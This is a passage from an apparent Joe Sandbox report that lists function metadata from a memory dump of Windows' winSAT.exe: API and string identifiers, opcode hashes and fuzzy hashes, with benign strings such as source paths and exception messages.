                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ByteCharMultiWide$___lc_codepage_func___lc_handle_func__pctype_func_errno
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 421588663-0
                                                                                                                                                                                              • Opcode ID: ae56b83ad9c13da46f90dab1eb4e49b5b61b40e439f9a70da339b1ef986ca986
                                                                                                                                                                                              • Instruction ID: f1c024ed65624a319bfdcb17ce89c20355069226b7913726601ab11b7b0aaae2
                                                                                                                                                                                              • Opcode Fuzzy Hash: ae56b83ad9c13da46f90dab1eb4e49b5b61b40e439f9a70da339b1ef986ca986
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7E41A73AA08782C6E710AF169D00178B7A0BF59B94F784135DA898B791DFBCE451C731
                                                                                                                                                                                              Function 00007FF780FB10CC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 112fileCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLast$DeleteFile
                                                                                                                                                                                              • String ID: $base\winsat\exe\datastore.cpp
                                                                                                                                                                                              • API String ID: 2815225636-844843430
                                                                                                                                                                                              • Opcode ID: a5564abd8709009237ef8a2c83dce2529d74814c89a6f2025dd7930ea92ffb15
                                                                                                                                                                                              • Instruction ID: be0a57de27dfc4b08ed5027575de5f4a2dcfe07b18476a26d2fbc23d57aa8f68
                                                                                                                                                                                              • Opcode Fuzzy Hash: a5564abd8709009237ef8a2c83dce2529d74814c89a6f2025dd7930ea92ffb15
                                                                                                                                                                                              • Instruction Fuzzy Hash: FE41BF22B0CA4285EB14EB16E8502B9F3A0FB85B94FE49131EA5D477D5DF3CE855C720
                                                                                                                                                                                              Function 00007FF780FC9C0C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 111COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrowstd::bad_exception::bad_exception
                                                                                                                                                                                              • String ID: at is larger than buffer size$reserve is equal to npos
                                                                                                                                                                                              • API String ID: 1480402491-2198646489
                                                                                                                                                                                              • Opcode ID: 1693c0aa944adf6ccee7e5aa0a7875ad688975879ebba8e1b89f8b39f9d661d3
                                                                                                                                                                                              • Instruction ID: e230f4730e406903e10633af06fab75060fa1d828ae37d88aea0eca3b2aee050
                                                                                                                                                                                              • Opcode Fuzzy Hash: 1693c0aa944adf6ccee7e5aa0a7875ad688975879ebba8e1b89f8b39f9d661d3
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0E418262A1DA86C0EB50EB25E451369B3A0FB85BB0FE48231DAAD077D5DF2CE405C720
                                                                                                                                                                                              Function 00007FF780FA941C Relevance: 10.6, APIs: 7, Instructions: 101COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLast$EnvironmentVariable
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2691138088-0
                                                                                                                                                                                              • Opcode ID: a5fe005e695b21b615d4409c5b7ebbf6fe051a5afc6847355b597b694eeeb8b9
                                                                                                                                                                                              • Instruction ID: d011a9dc07c4c569d5dcc40343926e92ea5e031a4fb852e2b4e813d7a55c6d45
                                                                                                                                                                                              • Opcode Fuzzy Hash: a5fe005e695b21b615d4409c5b7ebbf6fe051a5afc6847355b597b694eeeb8b9
                                                                                                                                                                                              • Instruction Fuzzy Hash: AB417F35A0DA428AEB00AF16E85117DF7A0FB89F94FA9D134CA1E07795CF78E451C760
                                                                                                                                                                                              Function 00007FF780FAB800 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 100COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrowstd::bad_exception::bad_exception
                                                                                                                                                                                              • String ID: boq < end$boq > end
                                                                                                                                                                                              • API String ID: 1480402491-1743266199
                                                                                                                                                                                              • Opcode ID: 330fa67dad9a1903ec451b21651f11950c8b360f3213dc58239865c61c44a66c
                                                                                                                                                                                              • Instruction ID: ecc27ffd005b171647411af47ad300e7976c3c68ed83442a6c2518fe839fb5ae
                                                                                                                                                                                              • Opcode Fuzzy Hash: 330fa67dad9a1903ec451b21651f11950c8b360f3213dc58239865c61c44a66c
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0141B462F1CA0A80EE10BB1AD4516BAA321FF94BD4FE09032DA4D077E5DF6CE556C360
                                                                                                                                                                                              Function 00007FF780FBA7AC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 90COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorExceptionLastThrowmemchrstd::bad_exception::bad_exception
                                                                                                                                                                                              • String ID: str is null
                                                                                                                                                                                              • API String ID: 2671770384-2182108151
                                                                                                                                                                                              • Opcode ID: fa4b7f40e0cf9e95676a63a1b791ac678c5f46e21efe3bfacd931084074e675a
                                                                                                                                                                                              • Instruction ID: de98750409bf705b75311389aa4f232ca38a10a784e64486b3e9d721fba06168
                                                                                                                                                                                              • Opcode Fuzzy Hash: fa4b7f40e0cf9e95676a63a1b791ac678c5f46e21efe3bfacd931084074e675a
                                                                                                                                                                                              • Instruction Fuzzy Hash: 2431DF21A0C64281FA24BB26E8652B9A261BF84790FF0C035DA5E07BD5DE7CF051CB20
                                                                                                                                                                                              Function 00007FF780FAC22C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrowstd::bad_exception::bad_exception
                                                                                                                                                                                              • String ID: boq < end$boq > end
                                                                                                                                                                                              • API String ID: 1480402491-1743266199
                                                                                                                                                                                              • Opcode ID: 4eb33f3453a1a24120518c956fb7d5a5fedb60aab605e00ddad26cad4ac846de
                                                                                                                                                                                              • Instruction ID: 2cdf5f4e79ff958e636a81fc189ca710d70f69300dbcf4fc22dac244ce78c4fb
                                                                                                                                                                                              • Opcode Fuzzy Hash: 4eb33f3453a1a24120518c956fb7d5a5fedb60aab605e00ddad26cad4ac846de
                                                                                                                                                                                              • Instruction Fuzzy Hash: F921E061E2DA4684EF20B716D8513B9A3A1FF50784FE0A032E64E037E4EE2CF445C760
                                                                                                                                                                                              Function 00007FF780FA05A8 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 76synchronizationCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseDirectoryHandleMutexReleaseRemoveUninitialize
                                                                                                                                                                                              • String ID: > exit value = %d.$base\winsat\exe\main.cpp
                                                                                                                                                                                              • API String ID: 1552449126-2481351200
                                                                                                                                                                                              • Opcode ID: cd91ec2066de2df89daa11ab069e221cc4274a19cbca8b155f9b1c4fa0c54e77
                                                                                                                                                                                              • Instruction ID: 7fe5efa7f79b385ef6c4fe62707942368d902fec7e69517265036fa433decf57
                                                                                                                                                                                              • Opcode Fuzzy Hash: cd91ec2066de2df89daa11ab069e221cc4274a19cbca8b155f9b1c4fa0c54e77
                                                                                                                                                                                              • Instruction Fuzzy Hash: 02416C21E0DA4295FB20BB11F850275EB60FF85B98FE45034D94E027A1CEADF854CB61
                                                                                                                                                                                              Function 00007FF7810198E8 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68registryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseOpenQueryValue_wcsnicmp
                                                                                                                                                                                              • String ID: Locale$Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
                                                                                                                                                                                              • API String ID: 2262609651-1161606707
                                                                                                                                                                                              • Opcode ID: 1c8a1ebd95c7d6c3900b2f36966723cd74bcf3b5f3fbe721d261d7b69e227c7c
                                                                                                                                                                                              • Instruction ID: 5f3f1b90cbcc4f9f58aedb91f0141d80bcc4c7dc12d88171d215305a9f396c48
                                                                                                                                                                                              • Opcode Fuzzy Hash: 1c8a1ebd95c7d6c3900b2f36966723cd74bcf3b5f3fbe721d261d7b69e227c7c
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0231BE36A18B42C6EB10AF55F84416AB7A5FB49B90FE14235EE9D03718EF7CE440CB20
                                                                                                                                                                                              Function 00007FF780FA9134 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 66COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: StringTypeiswdigit
                                                                                                                                                                                              • String ID: +$.$.
                                                                                                                                                                                              • API String ID: 2361181425-1083070178
                                                                                                                                                                                              • Opcode ID: 6894a1cefe64487843db14900f88111ba45e613a7ebee7ca7c423cccc6463b8f
                                                                                                                                                                                              • Instruction ID: 2fc3dfe9316d8c06c1f8dbbbd80db5635843949697c5863874c6f2711538052c
                                                                                                                                                                                              • Opcode Fuzzy Hash: 6894a1cefe64487843db14900f88111ba45e613a7ebee7ca7c423cccc6463b8f
                                                                                                                                                                                              • Instruction Fuzzy Hash: C2212E66A0E94681DF606B17D4442BCA7A1FB55F88F98E031C61D073E4EFACE8A0C321
                                                                                                                                                                                              Function 00007FF7810A4E14 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 48COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrowstd::bad_exception::bad_exception
                                                                                                                                                                                              • String ID: invalid string position$string too long
                                                                                                                                                                                              • API String ID: 1480402491-4289949731
                                                                                                                                                                                              • Opcode ID: 33da871457f849afeb2ea9d3135d4241acf9e1be73d3778c02623f62942d3db9
                                                                                                                                                                                              • Instruction ID: 541e05b0a69aeb89028b4239f9c714b7677f10600fe3d881d7665afb44eeae61
                                                                                                                                                                                              • Opcode Fuzzy Hash: 33da871457f849afeb2ea9d3135d4241acf9e1be73d3778c02623f62942d3db9
                                                                                                                                                                                              • Instruction Fuzzy Hash: 08010761A18A4B91DB20FB14E451295E321FB84374FE05331E5AD066E9DFACE549CB10
                                                                                                                                                                                              Function 00007FF780FAC9BB Relevance: 10.5, APIs: 5, Strings: 2, Instructions: 36COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLast$Resource$FindHandleLoadLockModuleSizeof
                                                                                                                                                                                              • String ID: H$base\winsat\exe\app.cpp
                                                                                                                                                                                              • API String ID: 2324310476-2745782611
                                                                                                                                                                                              • Opcode ID: 0ee5b5ec9a8e16899d29084875fadb3588918f9427494c48d729f24bbd051380
                                                                                                                                                                                              • Instruction ID: ed87bc9f0fdcdd7465565000bff1d579ddb1b6d89a9bead278809bcfa4059637
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0ee5b5ec9a8e16899d29084875fadb3588918f9427494c48d729f24bbd051380
                                                                                                                                                                                              • Instruction Fuzzy Hash: A9017525B189418BF3017B20EC001BCAE51FB8EB65FE49130C90F42395DF7D9445CB20
                                                                                                                                                                                              Function 00007FF780FD7C78 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 73COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLast
                                                                                                                                                                                              • String ID: *%s.Assessment (%s)$.WinSAT.xml$Initial$Prepop$Recent
                                                                                                                                                                                              • API String ID: 1452528299-1970178954
                                                                                                                                                                                              • Opcode ID: 70ccccdc94cd0a68233f563a8abbb9c68413d484faf92da40a1ad5d885aab81a
                                                                                                                                                                                              • Instruction ID: 78a5da3aff257052b930158597bb6792ef4b0f3ff2ea1a0abec3d12e18cd73d7
                                                                                                                                                                                              • Opcode Fuzzy Hash: 70ccccdc94cd0a68233f563a8abbb9c68413d484faf92da40a1ad5d885aab81a
                                                                                                                                                                                              • Instruction Fuzzy Hash: E8316E61A1CB4285E710EB61D8885B9E760FB44790FE08136EE5D477E5DF7CE946C320
                                                                                                                                                                                              Function 00007FF780FEE028 Relevance: 9.1, APIs: 6, Instructions: 72COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseControlCreateDeviceEventHandle
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3513291518-0
                                                                                                                                                                                              • Opcode ID: fb14f995d762da89ae62e354b6569892eb82b15e0e5e13604b0771bab84508bc
                                                                                                                                                                                              • Instruction ID: fcda968de64f2c4417aa47b981ef86f92c9953158c89c8272ab62a8e5a0e143f
                                                                                                                                                                                              • Opcode Fuzzy Hash: fb14f995d762da89ae62e354b6569892eb82b15e0e5e13604b0771bab84508bc
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5A318536A18B41CAE7109F61E8406BDB7A4F789748FA49135DA4D43B48DF3CE094CB20
                                                                                                                                                                                              Function 00007FF78101950C Relevance: 9.1, APIs: 6, Instructions: 62filelibraryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$CloseCreateHandle$LibraryLoadMappingView
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1262414356-0
                                                                                                                                                                                              • Opcode ID: 63627befede15933f3d70a2739c40b6055ad21b108730a1737319e80b49d248c
                                                                                                                                                                                              • Instruction ID: 078cc8100a65d037d44f1fa93a21e23e92194d2c862f6dcef5fc9ee7e35db243
                                                                                                                                                                                              • Opcode Fuzzy Hash: 63627befede15933f3d70a2739c40b6055ad21b108730a1737319e80b49d248c
                                                                                                                                                                                              • Instruction Fuzzy Hash: FB215E36A18B5287E7109F55A904669FAA1FB89FA4FA98234CA1D03B58DF7C9405CB10
                                                                                                                                                                                              Function 00007FF7810A6244 Relevance: 9.0, APIs: 6, Instructions: 49timethreadCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 4104442557-0
                                                                                                                                                                                              • Opcode ID: cce533625d4a93ad2bec215c83d472f58196dd99c133dd953a9e13b3c0a25206
                                                                                                                                                                                              • Instruction ID: 71fcbe4032e8b58741649dfa6fb1678fd3b7ad182b261fe531d4960cd10c3f88
                                                                                                                                                                                              • Opcode Fuzzy Hash: cce533625d4a93ad2bec215c83d472f58196dd99c133dd953a9e13b3c0a25206
                                                                                                                                                                                              • Instruction Fuzzy Hash: 39113E26A04F428BEB40EF61EC4516973A4FB08768FA01A30EA5D46758EFBCD1A4C750
                                                                                                                                                                                              Function 00007FF780F945B0 Relevance: 9.0, APIs: 6, Instructions: 44threadsynchronizationCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
